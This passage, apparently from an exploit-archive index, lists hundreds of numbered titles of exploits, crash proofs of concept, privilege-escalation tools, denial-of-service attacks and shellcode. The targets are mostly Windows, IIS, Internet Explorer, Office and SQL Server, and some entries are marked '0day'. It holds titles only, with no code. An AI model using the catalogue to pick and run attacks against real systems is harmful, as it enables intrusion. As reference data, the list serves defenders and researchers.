Overflow Vulnerability [23094] Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 Document Handling Buffer Overrun Vulnerability [23083] MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) [23044] Microsoft Internet Explorer 5/6 Object Type Validation Vulnerability [23034] Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness [23007] Windows AlwaysInstallElevated MSI [22959] Microsoft Outlook Express 5/6 Script Execution Weakness [22957] Microsoft SQL Server 7.0/2000,MSDE Named Pipe Denial of Service Vulnerability [22919] Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities [22869] Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution Vulnerability [22850] Microsoft Office OneNote 2010 Crash PoC [22784] Microsoft Internet Explorer 5 Custom HTTP Error HTML Injection Vulnerability [22783] Microsoft Internet Explorer 5/6 MSXML XML File Parsing Cross-Site Scripting Vulnerability [22734] Microsoft Internet Explorer 6 %USERPROFILE% File Execution Weakness [22728] Microsoft Internet Explorer 5 Classic Mode FTP Client Cross Domain Scripting Vulnerability [22726] Microsoft Internet Explorer 5 OBJECT Tag Buffer Overflow Vulnerability [22679] Microsoft Visio 2010 Crash PoC [22670] Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability [22655] Microsoft Publisher 2013 Crash PoC [22621] Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability [22591] Microsoft Office Excel 2007 - WriteAV Crash PoC [22576] Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 Buffer Overrun Vulnerability [22563] Microsoft IIS 5 User Existence Disclosure Vulnerability (2) [22562] Microsoft IIS 5 User Existence Disclosure Vulnerability (1) [22555] Microsoft BizTalk Server 2000/2002 DTA RawCustomSearchField.asp SQL Injection [22554] Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability [22553] Microsoft BizTalk Server 2002 HTTP Receiver Buffer Overflow Vulnerability [22530] Microsoft Internet Explorer 5 Remote URLMON.DLL Buffer Overflow Vulnerability [22518] Microsoft Shlwapi.dll 6.0.2800 .1106 Malformed HTML Form Tag DoS Vulnerability [22489] Windows XP PRO SP3 - Full ROP calc shellcode [22390] Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service Vulnerability [22330] Microsoft Office Excel 2010 Crash PoC [22310] Microsoft Office Publisher 2010 Crash PoC [22288] Microsoft Internet Explorer 5/6 Self Executing HTML File Vulnerability [22280] Microsoft Outlook2000/Express 6.0 Arbitrary Program Execution Vulnerability [22251] AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow [22237] Microsoft Office Picture Manager 2010 Crash PoC [22226] Microsoft Internet Explorer 5 ShowHelp Arbitrary Command Execution Vulnerability [22215] Microsoft Office Word 2010 Crash PoC [22119] Microsoft Pocket Internet Explorer 3.0 - Denial of Service Vulnerability [22027] Microsoft Java Virtual Machine 3802 Series Bytecode Verifier Vulnerability [21994] Windows Escalate Service Permissions Local Privilege Escalation [21986] Windows Media Player 10 - .avi Integer Division By Zero Crash PoC [21959] Microsoft Internet Explorer 5/6 Cached Objects Zone Bypass Vulnerability [21932] Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow Vulnerability [21923] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (2) [21922] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (1) [21920] Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability [21910] Microsoft IIS 5.0 IDC Extension Cross Site Scripting Vulnerability [21902] MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow [21898] SurfControl SuperScout WebFilter for windows 2000 SQL Injection Vulnerability [21897] SurfControl SuperScout WebFilter for windows 2000 File Disclosure Vulnerability [21883] Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability [21845] Windows Escalate UAC Protection Bypass [21843] Windows Escalate UAC Execute RunAs [21840] MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability [21803] Microsoft Internet Explorer 6 URI Handler Restriction Circumvention Vulnerability [21750] Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant Vulnerability [21749] Microsoft Internet Explorer 5/6 XML Redirect File Disclosure Vulnerability [21747] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2) [21746] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1) [21721] Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability [21718] Microsoft SQL 2000/7.0 Agent Jobs Privilege Elevation Vulnerability [21711] Microsoft Outlook Express 5/6 MHTML URL Handler File Rendering Vulnerability [21705] Microsoft Internet Explorer 6.0 File Attachment Script Execution Vulnerability [21703] Citrix Metaframe for Windows NT 4.0 TSE 1.8 Java ICA Environment DoS [21693] Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability [21691] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (8) [21690] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (7) [21689] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (6) [21688] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (5) [21687] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (4) [21686] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (3) [21685] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (2) [21684] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (1) [21662] Microsoft Outlook Express 6 XML File Attachment Script Execution Vulnerability [21652] Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability [21651] Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability [21650] Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability [21631] Microsoft Outlook Express 5/6 Spoofable File Extensions Vulnerability [21625] Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass [21613] Microsoft IIS 4/5 SMTP Service Encapsulated SMTP Address Vulnerability [21601] Microsoft Foundation Class Library 7.0 ISAPI Buffer Overflow Vulnerability [21556] Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service [21555] Cisco Secure ACS for Windows NT 3.0 Cross-site Scripting Vulnerability [21549] Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability [21541] Microsoft SQL Server 2000 SQLXML Script Injection Vulnerability [21540] Microsoft SQL Server 2000 SQLXML Buffer Overflow Vulnerability [21530] Seanox DevWex Windows Binary 1.2002.520 File Disclosure [21481] Microsoft MSN Messenger 1-4 Malformed Invite Request Denial of Service [21452] Microsoft Internet Explorer 5.0.1/6.0 Content-Disposition Handling File Execution Vulnerability [21419] Microsoft Outlook Express 5.5 DoS Device Denial of Service Vulnerability [21404] Microsoft Internet Explorer 5/6 Self-Referential Object Denial of Service Vulnerability [21387] WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow [21385] Microsoft IIS 5.0 CodeBrws.ASP Source Code Disclosure Vulnerability [21376] Microsoft Internet Explorer 5.5/6.0 History List Script Injection Vulnerability [21372] Microsoft IIS 4/5 HTTP Error Page Cross Site Scripting Vulnerability [21371] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (4) [21370] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (3) [21369] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2) [21368] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (1) [21361] Microsoft Internet Explorer 5 Cascading Style Sheet File Disclosure Vulnerability [21313] Microsoft IIS 4.0/5.0/5.1 Authentication Method Disclosure Vulnerability [21260] Microsoft Site Server 3.0 Cross-Site Scripting Vulnerability [21225] John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability [21199] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (2) [21198] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (1) [21195] Microsoft Internet Explorer 5/6 GetObject File Disclosure Vulnerability [21189] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (2) [21188] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (1) [21177] Microsoft IIS 5.0 False Content-Length Field DoS Vulnerability [21164] Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability [21144] Microsoft Internet Explorer 5/6 Cookie Disclosure/Modification Vulnerability [21127] Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing Vulnerability [21118] Microsoft Internet Explorer 5 Zone Spoofing Vulnerability [21113] Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability [21072] Microsoft IIS 5.0 In-Process Table Privelege Elevation Vulnerability [21071] Microsoft IIS 4/5 SSI Buffer Overrun Privelege Elevation [21040] Windows 98 ARP Denial of Service Vulnerability [21004] Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability [21003] Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability [20997] HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS [20991] Microsoft IIS 4.0/5.0 Device File Remote DoS Vulnerability [20989] Microsoft IIS 4.0/5.0 Device File Local DoS Vulnerability [20912] Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability [20903] Microsoft Internet Explorer 5.5 File Disclosure Vulnerability [20899] Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability [20893] Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 Remote Reconfiguration Vulnerability [20880] MS Windows 2000 Debug Registers Vulnerability [20846] Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability [20818] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4) [20817] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3) [20816] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2) [20815] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1) [20814] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5) [20813] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4) [20812] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3) [20811] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2) [20810] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1) [20802] Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability [20782] Microsoft IE 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability [20770] GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service [20763] Microsoft ISA Server 2000 Web Proxy DoS Vulnerability [20688] Qualcomm Eudora 5.0.2 'Use Microsoft Viewer' Code Execution Vulnerability [20680] Microsoft IE 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability [20664] Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability [20605] Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability [20590] Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability [20571] Microsoft Outlook 2000 0/98 0/Express 5.5 Concealed Attachment Vulnerability [20543] Windows Service Trusted Path Privilege Escalation [20515] Microsoft Internet Explorer 5.0.1/5.5 'mstask.exe' CPU Consumption Vulnerability [20508] Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack [20481] Microsoft IIS 2.0/3.0 Appended Dot Script Source Disclosure Vulnerability [20472] IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability [20470] IBM DB2 Universal Database for Windows NT 6.1/7.1 SQL DoS Vulnerability [20459] Microsoft Internet Explorer 5 \'INPUT TYPE=FILE\' Vulnerability [20457] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability [20456] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability [20451] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability [20440] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (4)" [20439] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (3)" [20438] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (2)" [20437] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (1)" [20426] Microsoft Internet Explorer 5.5 Index.dat Vulnerability [20384] Microsoft IIS 4.0/5.0 Executable File Parsing Vulnerability [20383] Microsoft IIS 4.0 ISAPI Buffer Overflow Vulnerability [20324] iplanet certificate management system 4.2 for windows nt 4.0 - Directory Traversal [20310] Microsoft IIS 4.0 Pickup Directory DoS Vulnerability [20309] Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability [20306] Microsoft Virtual Machine Arbitrary Java Codebase Execution Vulnerability [20305] Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability [20289] Microsoft NetMeeting 3.0.1 4.4.3385 Remote Desktop Sharing DoS Vulnerability [20269] Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability [20235] Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability [20232] MS Windows 2000/NT 4 DLL Search Path Weakness [20219] WebTV for Windows 98/ME DoS Vulnerability [20174] Microsoft Internet Explorer Fixed Table Col Span Heap Overflow [20152] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (2)" [20151] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (1)" [20122] Microsoft Office SharePoint Server 2007 Remote Code Execution [20096] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 Internal IP Address Disclosure Vulnerability [20089] Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability [20079] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2) [20078] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (1) [20006] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (2) [20005] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (1) [19968] Windows 2000/95/98/NT 4.0 Long Filename Extension Vulnerability [19930] Windows Escalate Task Scheduler XML Privilege Escalation [19928] Microsoft Active Movie Control 1.0 Filetype Vulnerability [19908] Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability [19907] Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability [19830] Microsoft Index Server 2.0 '%20' ASP Source Disclosure Vulnerability [19827] NT 4.0 / Windows 2000 TCP/IP Printing Service DoS Vulnerability [19815] vqsoft vqserver for windows 1.9.9 - Directory Traversal vulnerability [19799] Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 MS DoS Device Name DoS [19789] Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability [19743] Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability [19742] microsoft iis 3.0/4.0,microsoft index server 2.0 - Directory Traversal [19734] Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability [19733] McAfee 4.0,Network Associates for Windows NT 4.0.2/4.0.3 a,Norton AntiVirus 2000 Recycle Bin Exclusion [19728] Microsoft Systems Management Server 2.0 Default Permissions Vulnerability [19638] Microsoft SQL Server 7.0/7.0 SP1 NULL Data DoS Vulnerability [19637] MS IE 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability [19633] Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow [19608] Windows 95/98 UNC Buffer Overflow Vulnerability (2) [19607] Windows 95/98 UNC Buffer Overflow Vulnerability (1) [19594] MS Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability [19516] Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow [19515] MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow [19473] Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability [19471] Microsoft Internet Explorer 5.0 HTML Form Control DoS [19445] Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability [19435] Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability [19425] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2) [19424] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1) [19415] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3) [19414] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2) [19413] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1) [19376] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability [19361] Microsoft IIS 3.0/4.0 Double Byte Code Page Vulnerability [19248] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (4) [19247] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (3) [19246] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (2) [19245] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (1) [19228] Microsoft IIS 4.0,Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability [19208] Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Vulnerability [19207] Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service Vulnerability [19194] Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability [19186] Microsoft XML Core Services MSXML Uninitialized Memory Corruption [19164] Microsoft IE4 Clipboard Paste Vulnerability [19156] Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability [19152] Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability [19144] Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability [19129] Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability [19118] Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability [19089] Windows OpenType Font - File Format DoS Exploit [19083] Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability [19037] MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability [19033] microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities [19026] Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow [18952] Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability [18894] Windows XP Keyboard Layouts Pool Corruption LPE 0day PoC (post-MS12-034) [18759] TFTP Server for Windows 1.4 ST WRQ Buffer Overflow [18606] Microsoft Terminal Services Use After Free (MS12-020) [18365] Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability [18334] Microsoft Office 2003 Home/Pro 0day [18272] Windows Explorer Denial of Service (DOS) [18271] Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS) [18143] MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow [18087] MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow [18078] Microsoft Excel 2003 11.8335.8333 Use After Free [18067] Microsoft Excel 2007 SP2 Buffer Overwrite Exploit [17830] Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption [17796] Windows Server 2008 R1 Local Denial of Service [17783] ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit [17659] MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow [17476] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053] [17451] Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability [17399] Microsoft Office XP Remote code Execution [17398] Windows Media Player with K-Lite Codec Pack DoS PoC [17227] Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC [17164] Microsoft Reader <= 2.1.1.3143 NULL Byte Write [17163] Microsoft Reader <= 2.1.1.3143 Array Overflow [17162] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17161] Microsoft Reader <= 2.1.1.3143 Heap Overflow [17160] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17159] Microsoft Host Integration Server <= 8.5.4224.0 DoS Vulnerabilities [17158] Microsoft HTML Help <= 6.1 Stack Overflow [17072] Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC [16991] Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions [16750] Microsoft Message Queueing Service DNS Name Path Overflow [16749] Microsoft RPC DCOM Interface Overflow [16748] Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) [16747] Microsoft Message Queueing Service Path Overflow [16740] Microsoft IIS FTP Server NLST Response Overflow [16698] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) [16686] Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) [16680] Microsoft Visual Basic VBP Buffer Overflow [16665] Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow [16649] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit [16625] Microsoft Excel Malformed FEATHEADER Record Vulnerability [16615] Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption [16612] Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution [16608] Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow [16605] Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download [16545] Microsoft Help Center XSS and Command Execution [16542] Microsoft OWC Spreadsheet HTMLURL Buffer Overflow [16537] Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption [16526] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) [16521] Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow [16516] Microsoft WMI Administration Tools ActiveX Buffer Overflow [16507] Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow [16472] Microsoft IIS 5.0 IDQ Path Overflow [16471] Microsoft IIS WebDAV Write Access Code Execution [16470] Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow [16469] Microsoft IIS 5.0 Printer Host Header Overflow [16468] Microsoft IIS 4.0 .HTR Path Overflow [16467] Microsoft IIS/PWS CGI Filename Double Decode Command Execution [16442] Microsoft DirectX DirectShow SAMI Buffer Overflow [16427] Windows RSH daemon Buffer Overflow [16403] CA BrightStor Agent for Microsoft SQL Overflow [16398] Microsoft SQL Server Hello Overflow [16396] Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection [16395] Microsoft SQL Server Payload Execution [16394] Microsoft SQL Server Payload Execution via SQL injection [16393] Microsoft SQL Server Resolution Overflow [16392] Microsoft SQL Server sp_replwritetovarbin Memory Corruption [16379] Microsoft Outlook Express NNTP Response Parsing Buffer Overflow [16378] Microsoft Workstation Service NetAddAlternateComputerName Overflow [16377] Microsoft ASN.1 Library Bitstring Heap Overflow [16375] Microsoft RRAS Service RASMAN Registry Overflow [16373] Microsoft Services MS06-066 nwapi32.dll [16372] Microsoft Workstation Service NetpManageIPCConnect Overflow [16371] Microsoft NetDDE Service Overflow [16369] Microsoft Services MS06-066 nwwks.dll [16368] Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow [16367] Microsoft Server Service NetpwPathCanonicalize Overflow [16366] Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) [16365] Microsoft Plug and Play Service Overflow [16364] Microsoft RRAS Service Overflow [16362] Microsoft Server Service Relative Path Stack Corruption [16361] Microsoft Print Spooler Service Impersonation Vulnerability [16359] Microsoft WINS Service Memory Overwrite [16358] Microsoft IIS ISAPI RSA WebAgent Redirect Overflow [16357] Microsoft IIS Phone Book Service Overflow [16356] Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow [16355] Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow [16354] Microsoft IIS ISAPI w3who.dll Query String Overflow [16334] Microsoft Private Communications Transport Overflow [16333] Windows Media Services ConnectFunnel Stack Buffer Overflow [16332] Veritas Backup Exec Windows Remote Agent Overflow [16262] MS Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011) [16166] MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow [16071] Microsoft Internet Explorer MHTML Protocol Handler XSS [16024] Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption [15984] MS11-002: Microsoft Data Access Components Vulnerability [15963] MS10-081: Windows Common Control Library (Comctl32) Heap Overflow [15894] MS10-073 Windows Class Handling Vulnerability [15803] Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC [15758] Windows Win32k Pointer Dereferencement PoC (MS10-098) [15609] Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day [15589] Windows Task Scheduler Privilege Escalation 0day [15319] Apache 2.2 (Windows) Local Denial of Service [15297] Windows Mobile 6.1 and 6.5 Double Free Denial of Service [15266] Windows NTLM Weak Nonce Vulnerability [15262] Microsoft Office HtmlDlgHelper Class Memory Corruption [15167] Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065) [15158] MOAUB #30 - Microsoft Unicode Scripts Processor Remote Code Execution [15148] MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption [15136] Windows Mobile 6.5 TR Phone Call Shellcode [15122] MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue [15116] Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM) [15112] MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow [15096] MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero [15094] MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow [15088] MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day) [15065] MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption [15061] microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities [15034] Microsoft Mspaint bmp crash Proof Of Concept [15019] MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability [14971] MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow [14944] MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow [14895] MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit [14782] Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) [14780] Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll) [14758] Microsoft Group Convertor DLL Hijacking Exploit (imm.dll) [14754] Microsoft Internet Connection Signup Wizard DLL Hijacking Exploit (smmscrpt.dll) [14751] Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll) [14746] Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll) [14745] Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll) [14744] Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll) [14728] Windows Live Email DLL Hijacking Exploit (dwmapi.dll) [14723] Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll) [14697] Windows XP SP3 English MessageBoxA Shellcode - 87 bytes [14613] Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service [14607] Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054) [14413] IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control [14361] Microsoft Excel 0x5D record Stack Overflow Vulnerability [14295] Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day) [14179] Microsoft Internet Information Services (IIS) 5 Authentication Bypass Vulnerability (MS10-065) [14156] Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability [13729] Windows Seven x64 (cmd) Shellcode 61 Bytes [13719] Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes [13639] Windows XP Professional SP2 ita calc.exe shellcode 36 bytes [13631] Windows XP Home Edition SP3 English (calc.exe) 37 bytes [13630] Windows Xp Home Edition SP2 English (calc.exe) 37 bytes [13582] "Windows XP Pro Sp2 English ""Wordpad"" Shellcode" [13581] "Windows XP Pro Sp2 English ""Message-Box"" Shellcode" [13532] MS Windows (DCOM RPC2) Universal Shellcode [13531] windows/XP-sp1 portshell on port 58821 116 bytes [13530] windows/XP 